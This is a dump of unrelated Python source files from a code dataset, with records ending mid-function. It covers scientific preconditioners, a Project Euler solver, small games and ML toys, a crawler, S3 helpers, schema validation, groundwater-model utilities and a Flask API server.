{2}\".format(item.comp_name,item.address,item.address2))\n\ndef searchbyName():\n a = input(\"회사명: \")\n for item in items:\n dodo = item.comp_name\n if dodo == a:\n print (item.comp_industry + \" \" + item.address + \" \" + item.address2)\n\ndef searchbyState():\n a = input(\"구 이름: \")\n for item in items:\n dodo = item.address\n dodo1 = dodo.split()\n if dodo1[1] == a:\n print (item.comp_industry + \" \" + item.comp_name + \" \" + item.address)\n print ()\n\ndef writeHTML():\n htmlfile = open(\"C:\\\\Users\\\\Joon\\\\Documents\\\\GitHub\\\\sortsort\\\\html.txt\", 'a')\n for item in items:\n htmlfile.write(\"\" + item.comp_name + \"\" + item.comp_industry + \"\" + item.comp_year + \"\" + item.address + \" \" + item.address2 + \"\" + item.phone + \"\\n\")\n\n\n htmlfile.close()\n\nwriteHTML()\n","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17457495","text":"from firedrake.preconditioners.base import PCBase\nfrom firedrake.petsc import PETSc\nimport copy\nfrom firedrake import Function\nfrom firedrake import*\n\nclass PCD(PCBase):\n\n needs_python_pmat = True\n\n def initialize(self, pc):\n from firedrake import TrialFunction, TestFunction, Function, DirichletBC, dx, \\\n Mesh, inner, grad, split, Constant, parameters\n from firedrake.assemble import allocate_matrix, create_assembly_callable\n prefix = pc.getOptionsPrefix() + \"pcd_\"\n\n _, P = pc.getOperators()\n context = P.getPythonContext()\n\n test, trial = context.a.arguments()\n\n Q = test.function_space()\n\n self.Q = Q\n\n p = TrialFunction(Q)\n q = TestFunction(Q)\n\n nu = context.appctx.get(\"nu\", 1.0)\n self.nu = nu\n\n mass = Constant(1.0/self.nu)*p*q*dx\n\n stiffness = inner(grad(p), grad(q))*dx\n \n state = context.appctx[\"state\"]\n\n velid = context.appctx[\"velocity_space\"]\n\n opts = PETSc.Options()\n \n default = parameters[\"default_matrix_type\"]\n Mp_mat_type = opts.getString(prefix+\"Mp_mat_type\", default)\n Kp_mat_type = opts.getString(prefix+\"Kp_mat_type\", default)\n self.Fp_mat_type = opts.getString(prefix+\"Fp_mat_type\", \"matfree\")\n\n Mp = assemble(mass, form_compiler_parameters=context.fc_params,\n mat_type=Mp_mat_type,\n options_prefix=prefix + \"Mp_\")\n \n \n Kp = assemble(stiffness, form_compiler_parameters=context.fc_params,\n mat_type=Kp_mat_type,\n options_prefix=prefix + \"Kp_\")\n\n\n Mksp = PETSc.KSP().create(comm=pc.comm)\n Mksp.incrementTabLevel(1, parent=pc)\n Mksp.setOptionsPrefix(prefix + \"Mp_\")\n Mksp.setOperators(Mp.petscmat)\n Mksp.setUp()\n Mksp.setFromOptions()\n self.Mksp = Mksp\n\n Kksp = PETSc.KSP().create(comm=pc.comm)\n Kksp.incrementTabLevel(1, parent=pc)\n Kksp.setOptionsPrefix(prefix + \"Kp_\")\n Kksp.setOperators(Kp.petscmat)\n Kksp.setUp()\n Kksp.setFromOptions()\n self.Kksp = Kksp\n \n u0 = split(state)[velid]\n fp = Constant(self.nu)*inner(grad(p), grad(q))*dx + inner(u0, grad(p))*q*dx\n\n self.Fp = allocate_matrix(fp, form_compiler_parameters=context.fc_params,\n mat_type=self.Fp_mat_type,\n options_prefix=prefix + \"Fp_\")\n\n self._assemble_Fp = create_assembly_callable(fp, tensor=self.Fp,\n form_compiler_parameters=context.fc_params,\n mat_type=self.Fp_mat_type)\n self._assemble_Fp()\n\n Fpmat = self.Fp.petscmat\n self.workspace = [Fpmat.createVecLeft() for i in (0, 1)]\n self.tmp = Function(self.Q)\n \n def update(self, pc):\n self._assemble_Fp()\n\n\n def apply(self, pc, x, y):\n a, b = self.workspace\n \n self.Mksp.solve(x, y)\n y.copy(a)\n\n self.Fp.petscmat.mult(a, b)\n \n self.Kksp.solve(b, a)\n\n y.axpy(1.0, a)\n y.scale(-1.0)\n\n def applyTranspose(self, pc, x, y):\n pass\n","sub_path":"Lid_driven_cavity/steady/2D/FPCD.py","file_name":"FPCD.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369477316","text":"#!/usr/bin/env python\n\n# The Expat License\n#\n# Copyright (c) 2017, Shlomi Fish\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport sys\nfrom six import print_\n# import functools\n\nif sys.version_info > (3,):\n long = int\n xrange = range\n\nc = [[0], [1]]\n\n\ndef E(x, y):\n if y <= 1:\n return y\n if y <= 3000:\n return c[y][x % y]\n return 1 + E(y, x % y)\n\n\nfor y in xrange(2, 3001):\n c.append([])\n arr = c[y]\n for m in xrange(y):\n arr.append(E(y, m)+1)\n\n\n# @functools.lru_cache(maxsize=128*1024)\ndef R(x, y):\n return 1+G(y, x % y)\n\n\ndef G(x, y):\n if y <= 1:\n return y\n return R(x, y)\n\n\ndef S(n):\n ret = 0\n # For x == y\n ret += n\n for x in xrange(1, n+1):\n mods = [0, 1]\n for m in xrange(1, x):\n mods.append(mods[-1] + 1 + E(x, m))\n print_(\"x = %d ; m1 = %d ; m0 = %d\" % (x, mods[-1], mods[-1]-x))\n max_ = n - n % x\n t = max_ // x - 1\n delta = t*((mods[-1] << 1))+((mods[n-max_+1]-1) << 1)+n-x\n ret += delta\n if ((x & 0x3FF) == 0):\n print_(\"x = %d ; ret = %d\" % (x, ret))\n sys.stdout.flush()\n if False:\n d = 0\n for y in xrange(x+1, n+1):\n d += E(x, y) + E(y, x)\n print_(\"x = %d ; d = %d ; delta = %d\" % (x, d, delta))\n print_(\"n = %d ; ret = %d\" % (n, ret))\n return ret\n\n# if False:\n# d = 0\n# for x in xrange(y+1, n+1):\n# d += E(x, y) + E(y, x)\n# print_(\"y = %d ; d = %d ; delta = %d\" % (y, d, delta))\n\n\ndef main():\n S(10)\n S(100)\n S(5000000)\n\n\nmain()\n","sub_path":"project-euler/433/euler_433_v3.py","file_name":"euler_433_v3.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198003599","text":"import random\n\ndef choose():\n words=['Computer','Rainbow','Science','Programming','player']\n pick=random.choice(words)\n return pick\n\ndef jumble(word):\n jumbled=\"\".join(random.sample(word,len(word)))\n return jumbled\n\ndef thank(p1n,p2n,p1,p2):\n print(p1n,\"Your score is\",p1)\n print(p2n,\"your score is\",p2)\n print(\"Have a nice day\")\n\ndef play():\n p1name=input(\"Enter the name 1\")\n p2name=input(\"Enter the name 2 \")\n pp1=0\n pp2=0\n turn=0\n while(1):\n picked_word=choose()\n qn=jumble(picked_word)\n print(qn)\n if turn%2==0:\n print(p1name,\"This is your turn\")\n ans=input(\"Whats on my mind?\")\n if ans==picked_word:\n pp1=pp1+1\n print(pp1,\"is your score\")\n else:\n print(\"Better luck next time,I thought the word :\",picked_word)\n c=input(\"Do you want to continue\")\n if c==0:\n thank(p1name,p2name,pp1,pp2)\n break\n else:\n print(p2name,\"This is your turn\")\n ans = input(\"Whats on my mind?\")\n if ans == picked_word:\n pp2 = pp2 + 1\n print(pp2, \"is your score\")\n else:\n print(\"Better luck next time,I thought the word :\", picked_word)\n c = input(\"Do you want to continue\")\n if c == 0:\n thank(p1name, p2name, pp1, pp2)\n break\n turn=turn+1\nplay()\n","sub_path":"guesstheword.py","file_name":"guesstheword.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112096962","text":"import numpy as np\nfrom nltk.tokenize import wordpunct_tokenize\nfrom collections import Counter\nimport os \n\n## Take a directory as input, read all files in it and tokenize the text corpus\n\n\n\ndef tokenize(directory,exclude_files):\n\tfull_content = ''\n\tfor _file in os.listdir(directory):\n\t\t#disp_count = 5\n\t\tif exclude_files and (_file in exclude_files):\n\t\t\tcontinue\n\t\twith open(directory+_file,'r') as f:\n\t\t\tcontents = f.readlines()\n\t\t\tfor item in contents:\n\t\t\t\ttry:\n\t\t\t\t\tsentence = item.split('\\t')[1].strip()\n\t\t\t\t\tfull_content += sentence\n\t\t\t\texcept IndexError:\n\t\t\t\t\tcontinue\n\t\t\t\t# if np.random.binomial(1,0.1):\n\n\t\t\t\t# \tprint sentence\n\t\t\t\t# \ttime.sleep(2)\t\t\t\t\n\t\t\t\t# \tdisp_count -=1 \n\t\t\t\t# \tif not disp_count:\n\t\t\t\t# \t\tprint '*'*100\n\t\t\t\t# \t\tbreak\n\t\t\t\t\t\t\n\t\t\t\t# else:\n\t\t\t\t# \tprint '#'\n\n\treturn wordpunct_tokenize(full_content.lower())","sub_path":"tokenized_text.py","file_name":"tokenized_text.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242192066","text":"\"\"\"Asignacion URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n #url(r'^',include('apps.Login.urls', namespace = 'login')),\n url(r'^colegio/', include('apps.Colegio.urls', namespace = 'colegio')),\n url(r'^curso/',include('apps.Curso.urls', namespace = 'curso')),\n url(r'^profesor/',include('apps.Profesor.urls', namespace = 'profesor')),\n url(r'^horario/',include('apps.Horario.urls', namespace = 'horario')),\n\n]\n","sub_path":"Asignacion/Asignacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430920829","text":"import urllib.request as request\nimport urllib\nfrom collections import deque\nimport re\n\nqueue = deque()\nvisited = set()\n\nurl = 'https://yande.re/post'\n\nqueue.append(url)\ncount = 1\n\nwhile queue:\n url = queue.popleft()\n visited != {url}\n print('正在抓取第' + str(count) + '个页面。')\n count += 1\n\n try:\n response = request.urlopen(url, timeout = 2)\n except:\n continue\n \n if 'html' not in response.getheader('Content-Type'):\n continue\n\n try:\n data = response.read().decode('UTF-8')\n except:\n continue\n\n link = re.compile('href=\\\"(.+?)\\\"')\n for href in link.findall(data):\n if 'http' in href and href not in visited:\n queue.append(href)\n print(href + ' ---> 加入待下载队列')\n \n\n\n\n\n\n","sub_path":"pic_crawler/post_test.py","file_name":"post_test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506511179","text":"import os_setup\nimport logging\nimport boto3\nfrom botocore.exceptions import ClientError\nimport requests\nimport shutil\nfrom botocore.client import Config\nimport os\n\nAWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\n\ndef create_presigned_url(bucket_name, object_name, expiration=6048000):\n \"\"\"Generate a presigned URL to share an S3 object\n\n :param bucket_name: string\n :param object_name: string\n :param expiration: Time in seconds for the presigned URL to remain valid\n :return: Presigned URL as string. If error, returns None.\n \"\"\"\n\n # Generate a presigned URL for the S3 object\n s3_client = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n try:\n response = s3_client.generate_presigned_url('get_object',\n Params={'Bucket': bucket_name,\n 'Key': object_name},\n ExpiresIn=expiration)\n except ClientError as e:\n logging.error(e)\n return None\n\n # The response contains the presigned URL\n return response\n\n\ndef upload_file(file_name, bucket, store_name='ETC', object_name='no-name.mp4'):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n\n try:\n response = s3_client.upload_file(file_name, bucket, '{media}/{video}/{store}/{file_name}'.format(\n media='media', video='video', store=store_name, file_name=object_name))\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\n\ndef resize_in_ratio(image_source, max_width_and_height, resize_source, quality=95):\n from PIL import Image\n response = requests.get(image_source, stream=True)\n file_root = './crawling/temp/temp.jpg'\n with open(file_root, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n data = Image.open(file_root)\n source_width, source_height = data.size\n if source_width > source_height:\n result_ratio = source_width / max_width_and_height\n result_width = int(source_width / result_ratio)\n result_height = int(source_height / result_ratio)\n else:\n result_ratio = source_height / max_width_and_height\n result_width = int(source_width / result_ratio)\n result_height = int(source_height / result_ratio)\n result_data = data.resize((result_width, result_height))\n result_data.save(resize_source, 'JPEG', quality=quality)\n print(os.path.getsize(file_root), os.path.getsize(resize_source), '{}% 압축'.format(\n int((1 - os.path.getsize(resize_source)/os.path.getsize(file_root))*100)))\n os.remove(file_root)\n\n\ndef upload_to_s3(file_root, upload_root):\n s3_client = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n config=Config(signature_version='s3v4'))\n with open(file_root, 'rb') as f:\n s3_client.upload_fileobj(f, 'wachu', upload_root)\n video_source = \"https://s3.console.aws.amazon.com/s3/object/wachu/\"+upload_root\n video_source = create_presigned_url(\n 'wachu', upload_root, expiration=6048000)\n","sub_path":"app/crawling/helper/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499432041","text":"# Exercise 6\n###############\n\n# Using keys and indexing, grab the 'hello' from the following dictionaries:\nd1 = {'simple_key': 'hello'}\n\nd2 = {'k1': {'k2': 'hello'}}\n\nd3 = {'k1': [{'nest_key': ['this is deep', ['hello']]}]}\n\nd1.get('simple_key')\nd2['k1']['k2']\nd3['k1'][0]['nest_key'][1]\n\n","sub_path":"nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210558025","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random as r\n\n#r.seed(123)\ntraining_data={'inp':[[1,1,1],[0,1,1],[1,0,1],[0,0,1]],'out':[1,1,0,0]}\nw1= r.randint(-10,10)\nw2= r.randint(-10,10)\nweights=[w1,w2,1]\nw_=[]\ny_=[]\nprint(training_data)\nprint('hi')\nprint(weights)\n\nfor i in range(0,4):\n calc=0\n for j in range(0,3):\n calc=calc+training_data['inp'][i][j]*weights[j]\n if calc>0:\n y_.append(1)\n else:\n y_.append(-1)\n\nfor i in range(0,10000):\n print('y_::'+str(y_))\n e=0\n for j in range(0,4):\n e=e+(training_data['out'][j]-y_[j])**2\n e=e**0.5\n print(e)\n j=r.randint(0,3)\n t=training_data['out'][j]\n print(str(t)+'+'+str(j))\n if t==y_[j]:\n pass\n else:\n w_=[]\n for k in range(0,3):\n w_.append(weights[k]+training_data['out'][j]*training_data['inp'][j][k])\n weights=w_\n print(weights)\n y_=[]\n for k in range(0,4):\n calc=0\n for j in range(0,3):\n calc=calc+training_data['inp'][k][j]*weights[j]\n if calc>0:\n #print('1')\n y_.append(1)\n else:\n #print('-1')\n y_.append(-1)\n #print('end')","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249607693","text":"\"\"\"\nValidate everything in this repo, such as syntax, structure, etc.\n\"\"\"\nimport sys\nimport os\nimport glob\nimport yaml\nimport jsonschema\nimport requests\nimport json\nfrom jsonschema.exceptions import ValidationError\n\nfrom test.helpers import get_config, wait_for_arangodb\n\n_CONF = get_config()\n\n# JSON schema for vertex and edge collection schemas found in /schema\nschema_schema = {\n \"type\": \"object\",\n \"required\": [\"name\", \"type\", \"schema\"],\n \"properties\": {\n \"name\": {\n 'title': 'Collection name',\n \"type\": \"string\",\n \"format\": r'^[a-z_]+$'\n },\n 'type': {\n 'type': 'string',\n 'enum': ['vertex', 'edge']\n },\n 'schema': {'type': 'object'}\n }\n}\n\n\ndef validate_json_schemas():\n \"\"\"Validate the syntax of all the JSON schemas.\"\"\"\n print('Validating JSON schemas..')\n names = set() # type: set\n for path in glob.iglob('schemas/**/*.yaml', recursive=True):\n name = os.path.basename(path)\n print(f' validating {path}..')\n with open(path) as fd:\n data = yaml.safe_load(fd)\n jsonschema.validate(data, schema_schema)\n # Check for any duplicate schema names\n if name in names:\n _fatal('Duplicate schemas for name ' + name)\n else:\n names.add(name)\n # Make sure it can be used as a JSON schema\n # If the schema is invalid, a SchemaError will get raised\n # Otherwise, the schema will work and a ValidationError will get raised (what we want)\n try:\n jsonschema.validate({}, data['schema'])\n except ValidationError:\n pass\n except Exception as err:\n print('=' * 80)\n print('Unable to load schema in ' + path)\n print(str(err))\n exit(1)\n # All schemas must be object types\n if data['schema']['type'] != 'object':\n _fatal('Schemas must be an object. Schema in %s is not an object.' % path)\n required = data['schema'].get('required', [])\n # Edges must require _from and _to while vertices must require _key\n has_edge_fields = ('_from' in required and '_to' in required)\n has_delta_edge_fields = ('from' in required and 'to' in required)\n if data['type'] == 'edge' and data.get('delta') and not has_delta_edge_fields:\n _fatal('Time-travel edge schemas must require \"from\" and \"to\" attributes in ' + path)\n elif data['type'] == 'edge' and not data.get('delta') and not has_edge_fields:\n _fatal('Edge schemas must require \"_from\" and \"_to\" attributes in ' + path)\n elif data['type'] == 'vertex' and data.get('delta') and 'id' not in required:\n _fatal('Time-travel vertex schemas must require the \"id\" attribute in ' + path)\n elif data['type'] == 'vertex' and not data.get('delta') and '_key' not in required:\n _fatal('Vertex schemas must require the \"_key\" attribute in ' + path)\n print(f'✓ {name} is valid.')\n print('..all valid.')\n\n\nstored_query_schema = {\n 'type': 'object',\n 'required': ['query', 'name'],\n 'properties': {\n 'name': {'type': 'string'},\n 'params': {'type': 'object'},\n 'query_prefix': {'type': 'string'},\n 'query': {'type': 'string'}\n }\n}\n\n\ndef validate_stored_queries():\n \"\"\"Validate the structure and syntax of all the queries.\"\"\"\n print('Validating AQL queries..')\n names = set() # type: set\n for path in glob.iglob('stored_queries/**/*.yaml', recursive=True):\n print(f' validating {path}..')\n with open(path) as fd:\n data = yaml.safe_load(fd)\n jsonschema.validate(data, stored_query_schema)\n name = data['name']\n filename = os.path.splitext(os.path.basename(path))[0]\n if name != filename:\n _fatal(f'Name key should match filename: {name} vs {filename}')\n if name in names:\n _fatal(f'Duplicate queries named {name}')\n else:\n names.add(name)\n # Make sure `params` can be used as a JSON schema\n if data.get('params'):\n # Make sure it can be used as a JSON schema\n # If the schema is invalid, a SchemaError will get raised\n # Otherwise, the schema will work and a ValidationError will get raised (what we want)\n try:\n jsonschema.validate({}, data['params'])\n except ValidationError:\n pass\n # Params must be of type 'object'\n if data['params'].get('type') != 'object':\n _fatal(\"Params schema must have type 'object'\")\n query = data.get('query_prefix', '') + ' ' + data['query']\n # Parse the AQL query on arangodb\n url = _CONF['db_url'] + '/_api/query'\n resp = requests.post(url, data=json.dumps({'query': query}), auth=_CONF['db_auth'])\n parsed = resp.json()\n if parsed['error']:\n _fatal(parsed['errorMessage'])\n query_bind_vars = set(parsed['bindVars'])\n params = set(data.get('params', {}).get('properties', {}).keys())\n if params != query_bind_vars:\n _fatal((f\"Bind vars are invalid.\\n\"\n f\" Extra vars in query: {query_bind_vars - params}.\\n\"\n f\" Extra params in schema: {params - query_bind_vars}\"))\n print(f'✓ {path} is valid.')\n print('..all valid.')\n\n\n# JSON schema for arangosearch views found in /views\nview_schema = {\n \"type\": \"object\",\n \"required\": [\"name\", \"type\"],\n \"properties\": {\n \"name\": {\n 'title': 'View name',\n \"type\": \"string\",\n \"format\": r'^[a-z_]+$'\n },\n 'type': {\n 'type': 'string',\n 'enum': ['arangosearch']\n }\n }\n}\n\n\ndef validate_views():\n \"\"\"Validate the structure and syntax of arangosearch views\"\"\"\n print('Validating views..')\n names = set() # type: set\n for path in glob.iglob('views/**/*.json', recursive=True):\n print(f' validating {path}..')\n with open(path) as fd:\n data = json.load(fd)\n jsonschema.validate(data, view_schema)\n name = data['name']\n filename = os.path.splitext(os.path.basename(path))[0]\n if name != filename:\n _fatal(f'Name key should match filename: {name} vs {filename}')\n if name in names:\n _fatal(f'Duplicate queries named {name}')\n else:\n names.add(name)\n\n print(f'✓ {name} is valid.')\n print('..all valid.')\n\n\ndef _fatal(msg):\n \"\"\"Fatal error.\"\"\"\n sys.stderr.write(str(msg) + '\\n')\n sys.exit(1)\n\n\nif __name__ == '__main__':\n wait_for_arangodb()\n validate_json_schemas()\n validate_stored_queries()\n validate_views()\n","sub_path":"test/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366707518","text":"import socket\nimport sys\n\n\ndef main():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"localhost\", 8080))\n s.sendall(b\"GET / HTTP/1.1\\r\\n\\r\\n\")\n while True:\n sys.stdout.write(s.recv(16384))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bench_socket.py","file_name":"bench_socket.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243700776","text":"import flopy\nimport numpy as np\n\n\ndef drop_iface(rec):\n \"\"\"\n Removes 'iface' column from stress period data recarray\n \"\"\"\n index = rec.dtype.names.index('iface')\n list_ = rec.tolist()\n for row, i in enumerate(list_):\n list_[row] = list(i)\n del list_[row][index]\n return list_\n\ndef update_mt_spd(model_object, stress_periods):\n \"\"\"\n Rewrites mt3d models spd packages to start/end transient stress_periods\n \"\"\"\n mt3d_spd_packages = {'SSM': flopy.mt3d.Mt3dSsm}\n\n print('Reading stress-period-data of the given model object...')\n print(' '.join(\n [\n 'Writing new packages for stress periods ',\n str(stress_periods[0]),\n ':',\n str(stress_periods[-1])\n ]\n )\n )\n\n for package_name in model_object.get_package_list():\n if package_name in mt3d_spd_packages:\n print('Preparing SPD for ' + package_name + ' package')\n package = model_object.get_package(package_name)\n print('\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"')\n print(package.stress_period_data.data)\n spd = {k: v for\n k, v in package.stress_period_data.data.items()\n if stress_periods[0] <= k <= stress_periods[-1]}\n\n if 'iface' in spd[stress_periods[0]].dtype.names:\n print('Removing IFACE from ' + package_name + ' package SPD')\n spd = {k: drop_iface(v) for k, v in spd}\n\n mt3d_spd_packages[package_name] = mt3d_spd_packages[package_name](\n model_object,\n stress_period_data=spd\n )\n # if package_name == 'BTN':\n # print('Preparing BTN package')\n # btn = flopy.mt3d.Mt3dBtn(model_object)\n \n # perlen = btn.perlen.array[stress_periods[0]:stress_periods[-1] + 1]\n # nstp = btn.nstp.array[stress_periods[0]:stress_periods[-1] + 1]\n # nper = len(stress_periods)\n\n return model_object\n\n\n\ndef update_mf_spd(model_object, stress_periods):\n \"\"\"\n Rewrites modflows models spd packages to start/end transient stress_periods\n \"\"\"\n\n modflow_spd_packages = {'WEL': flopy.modflow.ModflowWel,\n 'LAK': flopy.modflow.ModflowLak,\n 'RIV': flopy.modflow.ModflowRiv,\n 'CHD': flopy.modflow.ModflowChd,\n 'GHB': flopy.modflow.ModflowGhb}\n\n print('Reading stress-period-data of the given model object...')\n print(' '.join(\n [\n 'Writing new packages for stress periods ',\n str(stress_periods[0]),\n ':',\n str(stress_periods[-1])\n ]\n )\n )\n\n for package_name in model_object.get_package_list():\n if package_name in modflow_spd_packages:\n print('Preparing SPD for ' + package_name + ' package')\n package = model_object.get_package(package_name)\n spd = {k: v for\n k, v in package.stress_period_data.data.items()\n if stress_periods[0] <= k <= stress_periods[-1]}\n\n if 'iface' in spd[stress_periods[0]].dtype.names:\n print('Removing IFACE from ' + package_name + ' package SPD')\n spd = {k: drop_iface(v) for k, v in spd}\n\n modflow_spd_packages[package_name] = modflow_spd_packages[package_name](\n model_object,\n stress_period_data=spd\n )\n\n if package_name == 'DIS':\n print('Preparing DIS package')\n dis = model_object.get_package(package_name)\n perlen = dis.perlen.array[stress_periods[0]:stress_periods[-1] + 1]\n nstp = dis.nstp.array[stress_periods[0]:stress_periods[-1] + 1]\n steady = dis.steady.array[stress_periods[0]:stress_periods[-1] + 1]\n nper = len(perlen)\n delc = dis.delc.array\n delr = dis.delr.array\n nlay = dis.nlay\n nrow = dis.nrow\n ncol = dis.ncol\n top = dis.top.array\n botm = dis.botm.array\n laycbd = dis.laycbd.array\n dis_new = flopy.modflow.ModflowDis(\n model_object, nlay=nlay, nrow=nrow, ncol=ncol,\n delr=delr, delc=delc, top=top, steady=steady,\n botm=botm, laycbd=laycbd, perlen=perlen, nstp=nstp,\n nper=nper\n )\n\n return model_object\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243792340","text":"\"\"\"An API server for covid-19-ui.\"\"\"\nimport json\nimport os\n\nfrom mojimoji import han_to_zen\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\nfrom util import load_config\nfrom database import DBHandler\n\nhere = os.path.dirname(os.path.abspath(__file__))\ncfg = load_config()\n\napp = Flask(__name__)\nCORS(app, origins=cfg['access_control_allow_origin'])\n\nmongo = DBHandler(\n host=cfg['database']['host'],\n port=cfg['database']['port'],\n db_name=cfg['database']['db_name'],\n collection_name=cfg['database']['collection_name'],\n es_host=cfg['es']['host'],\n es_port=cfg['es']['port'],\n)\n\n\nclass InvalidUsage(Exception):\n\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\nclass InvalidPassword(Exception):\n\n status_code = 403\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.route('/')\ndef index():\n return 'it works'\n\n\ndef get_start() -> int:\n start = request.args.get('start', '0') # NOTE: set the default value as a string object.\n if not start.isdecimal():\n raise InvalidUsage('Parameter `start` must be an integer.')\n return int(start)\n\n\ndef get_limit() -> int:\n limit = request.args.get('limit', '10') # NOTE: set the default value as a string object.\n if not limit.isdecimal():\n raise InvalidUsage('Parameter `limit` must be an integer.')\n return int(limit)\n\n\ndef get_lang() -> str:\n lang = request.args.get('lang', 'ja')\n if lang not in {'ja', 'en'}:\n raise InvalidUsage('Allowed languages are `ja` and `en`.')\n return lang\n\n\ndef get_query() -> str:\n return request.args.get('query', '')\n\n\n@app.route('/classes')\n@app.route('/classes/')\n@app.route('/classes//')\ndef classes(class_=None, country=None):\n return jsonify(mongo.classes(class_, country, get_start(), get_limit(), get_lang(), get_query()))\n\n\n@app.route('/countries')\n@app.route('/countries/')\n@app.route('/countries//')\ndef countries(country=None, class_=None):\n return jsonify(mongo.countries(country, class_, get_start(), get_limit(), get_lang()))\n\n\n@app.route('/update', methods=['POST'])\ndef update():\n data = request.get_json()\n\n if data.get('password') != cfg['password']:\n raise InvalidPassword('The password is not correct')\n\n return jsonify(mongo.update_page(\n url=data.get('url'),\n is_about_covid_19=data.get('is_about_COVID-19'),\n is_useful=data.get('is_useful'),\n is_about_false_rumor=data.get('is_about_false_rumor'),\n icountry=data.get('new_displayed_country'),\n etopics=data.get('new_classes'),\n notes=han_to_zen(str(data.get('notes'))),\n category_check_log_path=cfg['database']['category_check_log_path']\n ))\n\n\n@app.route('/history', methods=['GET'])\ndef history():\n url = request.args.get('url')\n with open(cfg['database']['category_check_log_path'], mode='r') as f:\n for line in f.readlines()[::-1]:\n if line.strip():\n edited_info = json.loads(line.strip())\n if edited_info.get('url', '') == url:\n 